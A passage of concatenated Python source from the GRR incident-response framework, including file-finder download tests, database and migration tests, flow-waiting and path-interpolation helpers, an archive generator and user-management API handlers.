"History.plist", "History.xml.plist", "test.plist",
"parser_test/com.google.code.grr.plist",
"parser_test/InstallHistory.plist"
])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token)
data = open(r.stat_entry.pathspec.path, "rb").read()
self.assertEqual(aff4_obj.Read(100), data[:100])
if data_store.RelationalDBReadEnabled(category="filestore"):
fd = file_store.OpenFile(
db.ClientPath.FromPathSpec(self.client_id.Basename(),
r.stat_entry.pathspec))
self.assertEqual(fd.read(100), data[:100])
self.assertEqual(fd.hash_id.AsBytes(), hashlib.sha256(data).digest())
else:
hash_obj = data_store_utils.GetFileHashEntry(aff4_obj)
self.assertEqual(hash_obj.sha1, hashlib.sha1(data).hexdigest())
self.assertEqual(hash_obj.sha256, hashlib.sha256(data).hexdigest())
self.assertEqual(hash_obj.md5, hashlib.md5(data).hexdigest())
def testClientFileFinderUploadLimit(self):
paths = [os.path.join(self.base_path, "{**,.}/*.plist")]
action = rdf_file_finder.FileFinderAction.Download()
# TODO(hanuszczak): Instead of catching arbitrary runtime errors, we should
# catch specific instance that was thrown. Unfortunately, all errors are
# intercepted in the `MockWorker` class and converted to runtime errors.
with self.assertRaisesRegexp(RuntimeError, "exceeded network send limit"):
with test_lib.SuppressLogs():
self._RunClientFileFinder(paths, action, network_bytes_limit=1500)
def testClientFileFinderUploadBound(self):
paths = [os.path.join(self.base_path, "{**,.}/*.plist")]
action = rdf_file_finder.FileFinderAction.Download(
oversized_file_policy="DOWNLOAD_TRUNCATED", max_size=300)
session_id = self._RunClientFileFinder(paths, action)
results = flow_test_lib.GetFlowResults(self.client_id, session_id)
self.assertLen(results, 5)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertCountEqual(relpaths, [
"History.plist", "History.xml.plist", "test.plist",
"parser_test/com.google.code.grr.plist",
"parser_test/InstallHistory.plist"
])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token)
data = aff4_obj.read()
self.assertLessEqual(len(data), 300)
self.assertEqual(data,
open(r.stat_entry.pathspec.path, "rb").read(len(data)))
def testClientFileFinderUploadSkip(self):
paths = [os.path.join(self.base_path, "{**,.}/*.plist")]
action = rdf_file_finder.FileFinderAction.Download(
oversized_file_policy="SKIP", max_size=300)
session_id = self._RunClientFileFinder(paths, action)
results = flow_test_lib.GetFlowResults(self.client_id, session_id)
skipped = []
uploaded = []
for result in results:
if result.HasField("transferred_file"):
uploaded.append(result)
else:
skipped.append(result)
self.assertLen(uploaded, 2)
self.assertLen(skipped, 3)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in uploaded
]
self.assertCountEqual(relpaths, ["History.plist", "test.plist"])
for r in uploaded:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token)
self.assertEqual(
aff4_obj.Read(100),
open(r.stat_entry.pathspec.path, "rb").read(100))
def testClientFileFinderFilestoreIntegration(self):
paths = [os.path.join(self.base_path, "{**,.}/*.plist")]
action = rdf_file_finder.FileFinderAction.Download()
client_ids = self.SetupClients(2)
session_ids = {
c: self._RunClientFileFinder(paths, action, client_id=c)
for c in client_ids
}
results_per_client = {
c: flow_test_lib.GetFlowResults(c, session_id)
for c, session_id in iteritems(session_ids)
}
for client_id, results in iteritems(results_per_client):
self.assertLen(results, 5)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertCountEqual(relpaths, [
"History.plist", "History.xml.plist", "test.plist",
"parser_test/com.google.code.grr.plist",
"parser_test/InstallHistory.plist"
])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(client_id), token=self.token)
# When files are uploaded to the server they are stored as VFSBlobImage.
self.assertIsInstance(aff4_obj, aff4_grr.VFSBlobImage)
# There is a STAT entry.
self.assertTrue(aff4_obj.Get(aff4_obj.Schema.STAT))
if not data_store.RelationalDBReadEnabled("filestore"):
# Make sure the HashFileStore has references to this file for
# all hashes.
hash_entry = data_store_utils.GetFileHashEntry(aff4_obj)
fs = filestore.HashFileStore
md5_refs = list(fs.GetReferencesMD5(hash_entry.md5, token=self.token))
self.assertIn(aff4_obj.urn, md5_refs)
sha1_refs = list(
fs.GetReferencesSHA1(hash_entry.sha1, token=self.token))
self.assertIn(aff4_obj.urn, sha1_refs)
sha256_refs = list(
fs.GetReferencesSHA256(hash_entry.sha256, token=self.token))
self.assertIn(aff4_obj.urn, sha256_refs)
# Open the file inside the file store.
urn, _ = fs(None, token=self.token).CheckHashes([hash_entry]).next()
filestore_fd = aff4.FACTORY.Open(urn, token=self.token)
# This is a VFSBlobImage too.
self.assertIsInstance(filestore_fd, aff4_grr.VFSBlobImage)
# No STAT object attached.
self.assertFalse(filestore_fd.Get(filestore_fd.Schema.STAT))
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: grr_response_server/databases/mem_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl.testing import absltest
from grr_response_core.lib import flags
from grr_response_server import db_test_mixin
from grr_response_server.databases import mem
from grr.test_lib import test_lib
FLAGS = flags.FLAGS
class MemoryDBTest(db_test_mixin.DatabaseTestMixin, absltest.TestCase):
def CreateDatabase(self):
return mem.InMemoryDB(), None
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: grr_response_server/databases/migration_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import os
from absl.testing import absltest
import mock
from grr_response_core import config
from grr_response_core.lib import flags
from grr_response_server import artifact_registry
from grr_response_server import data_store
from grr_response_server import db
from grr_response_server.databases import mem
from grr_response_server.databases import migration
from grr.test_lib import test_lib
def _SetUpArtifacts():
test_artifacts_file = os.path.join(config.CONFIG["Test.data_dir"],
"artifacts", "test_artifacts.json")
artifact_registry.REGISTRY.AddFileSource(test_artifacts_file)
class ArtifactMigrationTest(absltest.TestCase):
def setUp(self):
super(ArtifactMigrationTest, self).setUp()
self._db_patcher = mock.patch.object(
data_store, "REL_DB", db.DatabaseValidationWrapper(mem.InMemoryDB()))
self._db_patcher.start()
self._artifact_patcher = mock.patch.object(
artifact_registry, "REGISTRY", artifact_registry.ArtifactRegistry())
self._artifact_patcher.start()
def tearDown(self):
self._db_patcher.stop()
self._artifact_patcher.stop()
super(ArtifactMigrationTest, self).tearDown()
@mock.patch.object(data_store, "RelationalDBReadEnabled", return_value=False)
def testMigratesAllArtifactsWithoutReadFromRelDB(self, unused_data_store):
self.assertEmpty(data_store.REL_DB.ReadAllArtifacts())
_SetUpArtifacts()
self.assertEmpty(data_store.REL_DB.ReadAllArtifacts())
migration.MigrateArtifacts()
self.assertLen(data_store.REL_DB.ReadAllArtifacts(), 29)
@mock.patch.object(data_store, "RelationalDBReadEnabled", return_value=True)
def testMigratesAllArtifactsWithReadFromRelDB(self, unused_data_store):
self.assertEmpty(data_store.REL_DB.ReadAllArtifacts())
_SetUpArtifacts()
self.assertEmpty(data_store.REL_DB.ReadAllArtifacts())
migration.MigrateArtifacts()
self.assertLen(data_store.REL_DB.ReadAllArtifacts(), 29)
def testMigrationWithOverwriteDoesNotThrow(self):
_SetUpArtifacts()
migration.MigrateArtifacts()
migration.MigrateArtifacts(overwrite=True)
self.assertLen(data_store.REL_DB.ReadAllArtifacts(), 29)
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: grr_response_server/data_stores/mysql_advanced_data_store_benchmark_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from grr_response_core.lib import flags
from grr_response_server import data_store_test
from grr_response_server.data_stores import mysql_advanced_data_store_test
from grr.test_lib import test_lib
class MysqlAdvancedDataStoreBenchmarks(
mysql_advanced_data_store_test.MysqlAdvancedTestMixin,
data_store_test.DataStoreBenchmarks):
"""Benchmark the mysql data store abstraction."""
class MysqlAdvancedDataStoreCSVBenchmarks(
mysql_advanced_data_store_test.MysqlAdvancedTestMixin,
data_store_test.DataStoreCSVBenchmarks):
"""Benchmark the mysql data store abstraction."""
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: server/grr_response_server/flow_utils.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import logging
import time
from grr_response_server import aff4
from grr_response_server import flow
from grr_response_server.aff4_objects import aff4_grr
# How long to wait, by default, for a flow to finish.
DEFAULT_TIMEOUT = 650
def GetUserInfo(knowledge_base, user):
# TODO: This docstring cannot be a raw literal because there are
# issues with raw unicode literals on Python 2. Once support for Python 2 is
# dropped, it can be made raw again.
# pylint: disable=g-docstring-has-escape
"""Get a User protobuf for a specific user.
Args:
knowledge_base: An rdf_client.KnowledgeBase object.
user: Username as string. May contain domain like DOMAIN\\user.
Returns:
A User rdfvalue or None
"""
# pylint: enable=g-docstring-has-escape
if "\\" in user:
domain, user = user.split("\\", 1)
users = [
u for u in knowledge_base.users
if u.username == user and u.userdomain == domain
]
else:
users = [u for u in knowledge_base.users if u.username == user]
if not users:
return
else:
return users[0]
def UpdateVFSFileAndWait(client_id,
vfs_file_urn,
token=None,
timeout=DEFAULT_TIMEOUT):
"""Waits for a file to be updated on the client.
Calls the UpdateVFSFile flow on a urn and waits for both it and the
ListDirectory flow it calls to finish.
Note that this is needed because any flows UpdateVFSFile calls via
VFS Update methods will not become child flows of UpdateVFSFile,
and therefore waiting for UpdateVFSFile to complete is not enough.
Args:
client_id: Which client to run the flow on.
vfs_file_urn: Path to VFSFile to update.
token: The datastore access token.
timeout: How long to wait for a flow to finish, maximum.
"""
# Wait for the UpdateVFSFile flow.
update_flow_urn = StartFlowAndWait(
client_id,
token=token,
timeout=timeout,
flow_name=aff4_grr.UpdateVFSFile.__name__,
vfs_file_urn=vfs_file_urn)
update_flow_obj = aff4.FACTORY.Open(
update_flow_urn, token=token, aff4_type=flow.GRRFlow)
# Get the child flow so we can wait for it too.
sub_flow_urn = update_flow_obj.state.get_file_flow_urn
# If there was no subflow, no need to wait for it.
if not sub_flow_urn:
return
WaitForFlow(sub_flow_urn, token=token, timeout=timeout)
def WaitForFlow(flow_urn,
token=None,
timeout=DEFAULT_TIMEOUT,
max_sleep_time=1,
min_sleep_time=0.2,
dampening_multiplier=0.9):
"""Waits for a flow to finish, polling while we wait.
Args:
flow_urn: The urn of the flow to wait for.
token: The datastore access token.
timeout: How long to wait before giving up, usually because the client has
gone away.
max_sleep_time: The initial and longest time to wait in between polls.
min_sleep_time: The final and shortest time to wait in between polls.
dampening_multiplier: The current sleep time is multiplied by this number on
each iteration. Controls how fast the polling reaches its minimum sleep
time. You probably want this to be less than 1, unless you want to wait an
increasing amount of time in between polls.
Raises:
IOError: If we time out while waiting for the client.
"""
start_time = time.time()
sleep_time = max_sleep_time
while True:
# Reopen the AFF4Object to check if its status has changed, and also make
# sure it's a flow.
with aff4.FACTORY.Open(
flow_urn, token=token, aff4_type=flow.GRRFlow) as flow_obj:
# Stop if the flow is done or has timed out.
if time.time() - start_time > timeout:
logging.warn("Timed out after waiting %ss for %s!", timeout, flow_obj)
raise IOError("Timed out trying to access client! Is it connected?")
if not flow_obj.GetRunner().IsRunning():
break
# Decrease the time we sleep each iteration.
sleep_time = max(sleep_time * dampening_multiplier, min_sleep_time)
time.sleep(sleep_time)
logging.debug("Waiting for %s, sleeping for %.3fs", flow_obj, sleep_time)
def StartFlowAndWait(client_id,
token=None,
timeout=DEFAULT_TIMEOUT,
**flow_args):
"""Runs a flow and waits for it to finish.
Args:
client_id: The client id of the client to run on.
token: The datastore access token.
timeout: How long to wait for a flow to complete, maximum.
**flow_args: Pass through to flow.
Returns:
The urn of the flow that was run.
"""
flow_urn = flow.StartAFF4Flow(
client_id=client_id, token=token, sync=True, **flow_args)
WaitForFlow(flow_urn, token=token, timeout=timeout)
return flow_urn
# TODO(user): Deprecate this function once there is an alternative for
# CacheGrep.
def InterpolatePath(path, knowledge_base, users=None, path_args=None, depth=0):
"""Take a string as a path on a client and interpolate with client data.
Args:
path: A single string/unicode to be interpolated.
knowledge_base: An rdf_client.KnowledgeBase object.
users: A list of string usernames, or None.
path_args: A dict of additional args to use in interpolation. These take
precedence over any system provided variables.
depth: A counter for recursion depth.
Returns:
A single string if users is None, otherwise a list of strings.
"""
sys_formatters = {
# TODO(user): Collect this during discovery from the registry.
# HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
# Value: SystemRoot
"systemroot": "c:\\Windows"
}
# Override any system formatters with path_args.
if path_args:
sys_formatters.update(path_args)
if users:
results = []
for user in users:
# Extract and interpolate user specific formatters.
user = GetUserInfo(knowledge_base, user)
if user:
formatters = dict((x.name, y) for x, y in user.ListSetFields())
formatters.update(sys_formatters)
try:
results.append(path.format(**formatters))
except KeyError:
pass # We may be missing values for some users.
return results
else:
try:
path = path.format(**sys_formatters)
except KeyError:
logging.warn("Failed path interpolation on %s", path)
return ""
if "{" in path and depth < 10:
path = InterpolatePath(
path,
knowledge_base=knowledge_base,
users=users,
path_args=path_args,
depth=depth + 1)
return path
```
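As a quick illustration of the interpolation helpers above, the fragment below builds a minimal knowledge base and expands a per-user path and a system path. The exact `rdf_client.User` fields used (`username`, `homedir`) are assumptions chosen to match what `GetUserInfo` and `InterpolatePath` read; real knowledge bases carry many more fields.
```python
# Hedged usage sketch for GetUserInfo / InterpolatePath defined above.
from grr_response_core.lib.rdfvalues import client as rdf_client

kb = rdf_client.KnowledgeBase(users=[
    rdf_client.User(username="alice", homedir=r"C:\Users\alice"),
])

# With a user list, one expanded path is returned per matching user.
per_user = InterpolatePath(
    "{homedir}\\AppData\\Local\\Temp", knowledge_base=kb, users=["alice"])
# -> ["C:\\Users\\alice\\AppData\\Local\\Temp"]

# Without users, only the system formatters (and any path_args) are applied.
system_only = InterpolatePath("{systemroot}\\System32", knowledge_base=kb)
# -> "c:\\Windows\\System32"
```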
#### File: gui/api_e2e_tests/client_labels_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from grr_response_core.lib import flags
from grr_response_proto import objects_pb2
from grr_response_server import aff4
from grr_response_server.aff4_objects import aff4_grr
from grr_response_server.gui import api_e2e_test_lib
from grr.test_lib import test_lib
class ApiClientLibLabelsTest(api_e2e_test_lib.ApiE2ETest):
"""Tests VFS operations part of GRR Python API client library."""
def setUp(self):
super(ApiClientLibLabelsTest, self).setUp()
self.client_urn = self.SetupClient(0)
def testAddLabels(self):
client_ref = self.api.Client(client_id=self.client_urn.Basename())
self.assertEqual(list(client_ref.Get().data.labels), [])
with test_lib.FakeTime(42):
client_ref.AddLabels(["foo", "bar"])
self.assertEqual(
sorted(client_ref.Get().data.labels, key=lambda l: l.name), [
objects_pb2.ClientLabel(name="bar", owner=self.token.username),
objects_pb2.ClientLabel(name="foo", owner=self.token.username)
])
def testRemoveLabels(self):
with test_lib.FakeTime(42):
with aff4.FACTORY.Open(
self.client_urn,
aff4_type=aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client_obj:
client_obj.AddLabels(["bar", "foo"])
client_ref = self.api.Client(client_id=self.client_urn.Basename())
self.assertEqual(
sorted(client_ref.Get().data.labels, key=lambda l: l.name), [
objects_pb2.ClientLabel(name="bar", owner=self.token.username),
objects_pb2.ClientLabel(name="foo", owner=self.token.username)
])
client_ref.RemoveLabel("foo")
self.assertEqual(
sorted(client_ref.Get().data.labels, key=lambda l: l.name),
[objects_pb2.ClientLabel(name="bar", owner=self.token.username)])
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: grr_response_server/gui/archive_generator_aff4.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import io
import logging
import os
import zipfile
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.util import collection
from grr_response_core.lib.util import yaml
from grr_response_server import aff4
from grr_response_server import db
from grr_response_server.aff4_objects import aff4_grr
from grr_response_server.flows.general import export as flow_export
class Aff4CollectionArchiveGenerator(object):
"""Class that generates downloaded files archive from a collection."""
ZIP = "zip"
TAR_GZ = "tar.gz"
FILES_SKIPPED_WARNING = (
"# NOTE: Some files were skipped because they were referenced in the \n"
"# collection but were not downloaded by GRR, so there were no data \n"
"# blobs in the data store to archive.\n").encode("utf-8")
BATCH_SIZE = 1000
def __init__(self,
archive_format=ZIP,
prefix=None,
description=None,
predicate=None,
client_id=None):
"""CollectionArchiveGenerator constructor.
Args:
archive_format: May be ArchiveCollectionGenerator.ZIP or
ArchiveCollectionGenerator.TAR_GZ. Defaults to ZIP.
prefix: Name of the folder inside the archive that will contain all the
generated data.
description: String describing archive's contents. It will be included
into the auto-generated MANIFEST file. Defaults to 'Files archive
collection'.
predicate: If not None, only the files matching the predicate will be
archived, all others will be skipped. The predicate receives a
db.ClientPath as input.
client_id: The client_id to use when exporting a flow results collection.
Raises:
ValueError: if prefix is None.
"""
super(Aff4CollectionArchiveGenerator, self).__init__()
if archive_format == self.ZIP:
self.archive_generator = utils.StreamingZipGenerator(
compression=zipfile.ZIP_DEFLATED)
elif archive_format == self.TAR_GZ:
self.archive_generator = utils.StreamingTarGenerator()
else:
raise ValueError("Unknown archive format: %s" % archive_format)
if not prefix:
raise ValueError("Prefix can't be None.")
self.prefix = prefix
self.description = description or "Files archive collection"
self.total_files = 0
self.archived_files = set()
self.ignored_files = set()
self.failed_files = set()
self.predicate = predicate or (lambda _: True)
self.client_id = client_id
@property
def output_size(self):
return self.archive_generator.output_size
def _ItemsToUrns(self, items):
"""Converts collection items to aff4 urns suitable for downloading."""
for item in items:
try:
yield flow_export.CollectionItemToAff4Path(item, self.client_id)
except flow_export.ItemNotExportableError:
pass
def _GenerateDescription(self):
"""Generates description into a MANIFEST file in the archive."""
manifest = {
"description": self.description,
"processed_files": self.total_files,
"archived_files": len(self.archived_files),
"ignored_files": len(self.ignored_files),
"failed_files": len(self.failed_files)
}
if self.ignored_files:
manifest["ignored_files_list"] = list(self.ignored_files)
if self.failed_files:
manifest["failed_files_list"] = list(self.failed_files)
manifest_fd = io.BytesIO()
if self.total_files != len(self.archived_files):
manifest_fd.write(self.FILES_SKIPPED_WARNING)
manifest_fd.write(yaml.Dump(manifest).encode("utf-8"))
manifest_fd.seek(0)
st = os.stat_result((0o644, 0, 0, 0, 0, 0, len(manifest_fd.getvalue()), 0,
0, 0))
for chunk in self.archive_generator.WriteFromFD(
manifest_fd, os.path.join(self.prefix, "MANIFEST"), st=st):
yield chunk
def _GenerateClientInfo(self, client_fd):
"""Yields chucks of archive information for given client."""
summary_dict = client_fd.GetSummary().ToPrimitiveDict(
stringify_leaf_fields=True)
summary = yaml.Dump(summary_dict).encode("utf-8")
client_info_path = os.path.join(self.prefix, client_fd.urn.Basename(),
"client_info.yaml")
st = os.stat_result((0o644, 0, 0, 0, 0, 0, len(summary), 0, 0, 0))
yield self.archive_generator.WriteFileHeader(client_info_path, st=st)
yield self.archive_generator.WriteFileChunk(summary)
yield self.archive_generator.WriteFileFooter()
def Generate(self, items, token=None):
"""Generates archive from a given collection.
Iterates the collection and generates an archive by yielding contents
of every referenced AFF4Stream.
Args:
items: Iterable with items that point to aff4 paths.
token: User's ACLToken.
Yields:
Binary chunks comprising the generated archive.
"""
clients = set()
for fd_urn_batch in collection.Batch(
self._ItemsToUrns(items), self.BATCH_SIZE):
self.total_files += len(fd_urn_batch)
fds_to_write = {}
for fd in aff4.FACTORY.MultiOpen(fd_urn_batch, token=token):
# Derive a ClientPath from AFF4 URN to make new and old
# archive_generator predicate input consistent.
# TODO(user): This code is clearly hacky and intended to be removed.
urn_components = fd.urn.Split()
if urn_components[1:3] != ["fs", "os"]:
raise AssertionError("URN components are expected to start with "
"client, 'fs', 'os'. Got %r" % (urn_components,))
client_path = db.ClientPath.OS(
client_id=urn_components[0], components=urn_components[3:])
if not self.predicate(client_path):
self.ignored_files.add(utils.SmartUnicode(fd.urn))
continue
# Any file-like object with data in AFF4 should inherit AFF4Stream.
if isinstance(fd, aff4.AFF4Stream):
urn_components = fd.urn.Split()
clients.add(rdf_client.ClientURN(urn_components[0]))
content_path = os.path.join(self.prefix, *urn_components)
# Make sure size of the original file is passed. It's required
# when output_writer is StreamingTarWriter.
st = os.stat_result((0o644, 0, 0, 0, 0, 0, fd.size, 0, 0, 0))
fds_to_write[fd] = (content_path, st)
if fds_to_write:
prev_fd = None
for fd, chunk, exception in aff4.AFF4Stream.MultiStream(fds_to_write):
if exception:
logging.exception(exception)
try:
self.archived_files.remove(utils.SmartUnicode(fd.urn))
except KeyError:
pass # Failing is fine, since removal should be idempotent.
self.failed_files.add(utils.SmartUnicode(fd.urn))
continue
if prev_fd != fd:
if prev_fd:
yield self.archive_generator.WriteFileFooter()
prev_fd = fd
content_path, st = fds_to_write[fd]
yield self.archive_generator.WriteFileHeader(content_path, st=st)
yield self.archive_generator.WriteFileChunk(chunk)
self.archived_files.add(utils.SmartUnicode(fd.urn))
if self.archive_generator.is_file_write_in_progress:
yield self.archive_generator.WriteFileFooter()
if clients:
for client_urn_batch in collection.Batch(clients, self.BATCH_SIZE):
for fd in aff4.FACTORY.MultiOpen(
client_urn_batch, aff4_type=aff4_grr.VFSGRRClient, token=token):
for chunk in self._GenerateClientInfo(fd):
yield chunk
for chunk in self._GenerateDescription():
yield chunk
yield self.archive_generator.Close()
```
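For context, here is a rough sketch of consuming the generator above: streaming a result collection into a ZIP file on disk. How `items` and `token` are obtained is left out (in GRR they come from the API layer); the point is that `Generate()` yields binary chunks that can be written sequentially without buffering the whole archive in memory.
```python
# Hedged sketch: stream an archive produced by Aff4CollectionArchiveGenerator
# to a local file. `items` is an iterable of collection items and `token` an
# ACL token, both assumed to be supplied by the caller.
def WriteArchiveToDisk(items, client_id, token, out_path="/tmp/results.zip"):
  generator = Aff4CollectionArchiveGenerator(
      archive_format=Aff4CollectionArchiveGenerator.ZIP,
      prefix="collection_results",
      description="Files archive collection",
      client_id=client_id)
  with open(out_path, "wb") as out:
    for chunk in generator.Generate(items, token=token):
      out.write(chunk)
  return generator.archived_files, generator.ignored_files
```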
#### File: root/api_plugins/user_management.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from grr_response_core.lib.rdfvalues import events as rdf_events
from grr_response_core.lib.rdfvalues import structs as rdf_structs
from grr_response_proto.api.root import user_management_pb2
from grr_response_server import access_control
from grr_response_server import aff4
from grr_response_server import data_store
from grr_response_server import db
from grr_response_server import events
from grr_response_server.aff4_objects import users
from grr_response_server.gui import api_call_handler_base
from grr_response_server.gui.api_plugins import user as api_user
class ApiCreateGrrUserArgs(rdf_structs.RDFProtoStruct):
protobuf = user_management_pb2.ApiCreateGrrUserArgs
class ApiCreateGrrUserHandler(api_call_handler_base.ApiCallHandler):
"""Creates a new GRR user."""
args_type = ApiCreateGrrUserArgs
result_type = api_user.ApiGrrUser
def Handle(self, args, token=None):
if not args.username:
raise ValueError("username can't be empty.")
if args.user_type != args.UserType.USER_TYPE_ADMIN:
args.user_type = args.UserType.USER_TYPE_STANDARD
if data_store.RelationalDBReadEnabled():
return self._HandleRelational(args)
else:
return self._HandleAff4(args, token)
def _HandleAff4(self, args, token):
user_urn = aff4.ROOT_URN.Add("users").Add(args.username)
events.Events.PublishEvent(
"Audit",
rdf_events.AuditEvent(
user=token.username, action="USER_ADD", urn=user_urn),
token=token)
if aff4.FACTORY.ExistsWithType(
user_urn, aff4_type=users.GRRUser, token=token):
raise access_control.UnauthorizedAccess(
"Cannot add user %s: User already exists." % args.username)
with aff4.FACTORY.Create(
user_urn, aff4_type=users.GRRUser, mode="rw", token=token) as fd:
if args.HasField("password"):
fd.SetPassword(args.password)
if args.user_type == args.UserType.USER_TYPE_ADMIN:
fd.AddLabels(["admin"], owner="GRR")
return api_user.ApiGrrUser().InitFromAff4Object(fd)
def _HandleRelational(self, args):
data_store.REL_DB.WriteGRRUser(
username=args.username,
password=<PASSWORD> if args.HasField("password") else None,
user_type=args.user_type,
)
user = data_store.REL_DB.ReadGRRUser(args.username)
return api_user.ApiGrrUser().InitFromDatabaseObject(user)
class ApiDeleteGrrUserArgs(rdf_structs.RDFProtoStruct):
protobuf = user_management_pb2.ApiDeleteGrrUserArgs
class ApiDeleteGrrUserHandler(api_call_handler_base.ApiCallHandler):
"""Deletes a GRR user."""
args_type = ApiDeleteGrrUserArgs
def Handle(self, args, token=None):
if not args.username:
raise ValueError("username can't be empty.")
if data_store.RelationalDBReadEnabled():
self._HandleRelational(args)
else:
self._HandleAff4(args, token)
def _HandleAff4(self, args, token):
user_urn = aff4.ROOT_URN.Add("users").Add(args.username)
events.Events.PublishEvent(
"Audit",
rdf_events.AuditEvent(
user=token.username, action="USER_DELETE", urn=user_urn),
token=token)
if not aff4.FACTORY.ExistsWithType(
user_urn, aff4_type=users.GRRUser, token=token):
raise api_call_handler_base.ResourceNotFoundError(
"GRR user with username '%s' could not be found." % args.username)
aff4.FACTORY.Delete(user_urn, token=token)
def _HandleRelational(self, args):
try:
data_store.REL_DB.DeleteGRRUser(args.username)
except db.UnknownGRRUserError as e:
raise api_call_handler_base.ResourceNotFoundError(e.message)
class ApiModifyGrrUserArgs(rdf_structs.RDFProtoStruct):
protobuf = user_management_pb2.ApiModifyGrrUserArgs
class ApiModifyGrrUserHandler(api_call_handler_base.ApiCallHandler):
"""Modifies a GRR user."""
args_type = ApiModifyGrrUserArgs
result_type = api_user.ApiGrrUser
def Handle(self, args, token=None):
if not args.username:
raise ValueError("username can't be empty.")
if args.HasField(
"user_type") and args.user_type != args.UserType.USER_TYPE_ADMIN:
args.user_type = args.UserType.USER_TYPE_STANDARD
if data_store.RelationalDBReadEnabled():
return self._HandleRelational(args)
else:
return self._HandleAff4(args, token)
def _HandleAff4(self, args, token):
user_urn = aff4.ROOT_URN.Add("users").Add(args.username)
events.Events.PublishEvent(
"Audit",
rdf_events.AuditEvent(
user=token.username, action="USER_UPDATE", urn=user_urn),
token=token)
with aff4.FACTORY.Open(
user_urn, aff4_type=users.GRRUser, mode="rw", token=token) as fd:
if args.HasField("password"):
fd.SetPassword(args.password)
if args.user_type == args.UserType.USER_TYPE_ADMIN:
fd.AddLabels(["admin"], owner="GRR")
elif args.user_type == args.UserType.USER_TYPE_STANDARD:
fd.RemoveLabels(["admin"], owner="GRR")
return api_user.ApiGrrUser().InitFromAff4Object(fd)
def _HandleRelational(self, args):
# query user, to throw if a nonexistent user should be modified
data_store.REL_DB.ReadGRRUser(args.username)
if args.HasField("password"):
password = args.password
else:
password = None
if args.HasField("user_type"):
user_type = args.user_type
else:
user_type = None
data_store.REL_DB.WriteGRRUser(
username=args.username, password=password, user_type=user_type)
user = data_store.REL_DB.ReadGRRUser(args.username)
return api_user.ApiGrrUser().InitFromDatabaseObject(user)
class ApiListGrrUsersArgs(rdf_structs.RDFProtoStruct):
protobuf = user_management_pb2.ApiListGrrUsersArgs
class ApiListGrrUsersResult(rdf_structs.RDFProtoStruct):
protobuf = user_management_pb2.ApiListGrrUsersResult
rdf_deps = [
api_user.ApiGrrUser,
]
class ApiListGrrUsersHandler(api_call_handler_base.ApiCallHandler):
"""Lists all users registered in the system."""
args_type = ApiListGrrUsersArgs
result_type = ApiListGrrUsersResult
def Handle(self, args, token=None):
if data_store.RelationalDBReadEnabled():
return self._HandleRelational(args)
else:
return self._HandleAff4(args, token)
def _HandleAff4(self, args, token=None):
users_root = aff4.FACTORY.Open(aff4.ROOT_URN.Add("users"), token=token)
usernames = sorted(users_root.ListChildren())
total_count = len(usernames)
if args.count:
usernames = usernames[args.offset:args.offset + args.count]
else:
usernames = usernames[args.offset:]
items = []
for aff4_obj in aff4.FACTORY.MultiOpen(
usernames, aff4_type=users.GRRUser, token=token):
items.append(api_user.ApiGrrUser().InitFromAff4Object(aff4_obj))
return ApiListGrrUsersResult(total_count=total_count, items=items)
def _HandleRelational(self, args):
total_count = data_store.REL_DB.CountGRRUsers()
db_users = data_store.REL_DB.ReadGRRUsers(
offset=args.offset, count=args.count)
items = [api_user.ApiGrrUser().InitFromDatabaseObject(u) for u in db_users]
return ApiListGrrUsersResult(total_count=total_count, items=items)
class ApiGetGrrUserArgs(rdf_structs.RDFProtoStruct):
protobuf = user_management_pb2.ApiGetGrrUserArgs
class ApiGetGrrUserHandler(api_call_handler_base.ApiCallHandler):
"""Returns information about a user with a given name."""
args_type = ApiGetGrrUserArgs
result_type = api_user.ApiGrrUser
def Handle(self, args, token=None):
if not args.username:
raise ValueError("username can't be empty.")
if data_store.RelationalDBReadEnabled():
return self._HandleRelational(args)
else:
return self._HandleAff4(args, token)
def _HandleAff4(self, args, token=None):
user_urn = aff4.ROOT_URN.Add("users").Add(args.username)
try:
fd = aff4.FACTORY.Open(
user_urn, aff4_type=users.GRRUser, mode="r", token=token)
return api_user.ApiGrrUser().InitFromAff4Object(fd)
except aff4.InstantiationError:
raise api_call_handler_base.ResourceNotFoundError(
"GRR user with username '%s' could not be found." % args.username)
def _HandleRelational(self, args):
try:
user = data_store.REL_DB.ReadGRRUser(args.username)
return api_user.ApiGrrUser().InitFromDatabaseObject(user)
except db.UnknownGRRUserError as e:
raise api_call_handler_base.ResourceNotFoundError(e.message)
```
#### File: server/grr_response_server/hunt.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import sys
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import registry
from grr_response_server import access_control
from grr_response_server import data_store
from grr_response_server import db
from grr_response_server import flow
from grr_response_server import foreman_rules
from grr_response_server import notification
from grr_response_server.aff4_objects import users as aff4_users
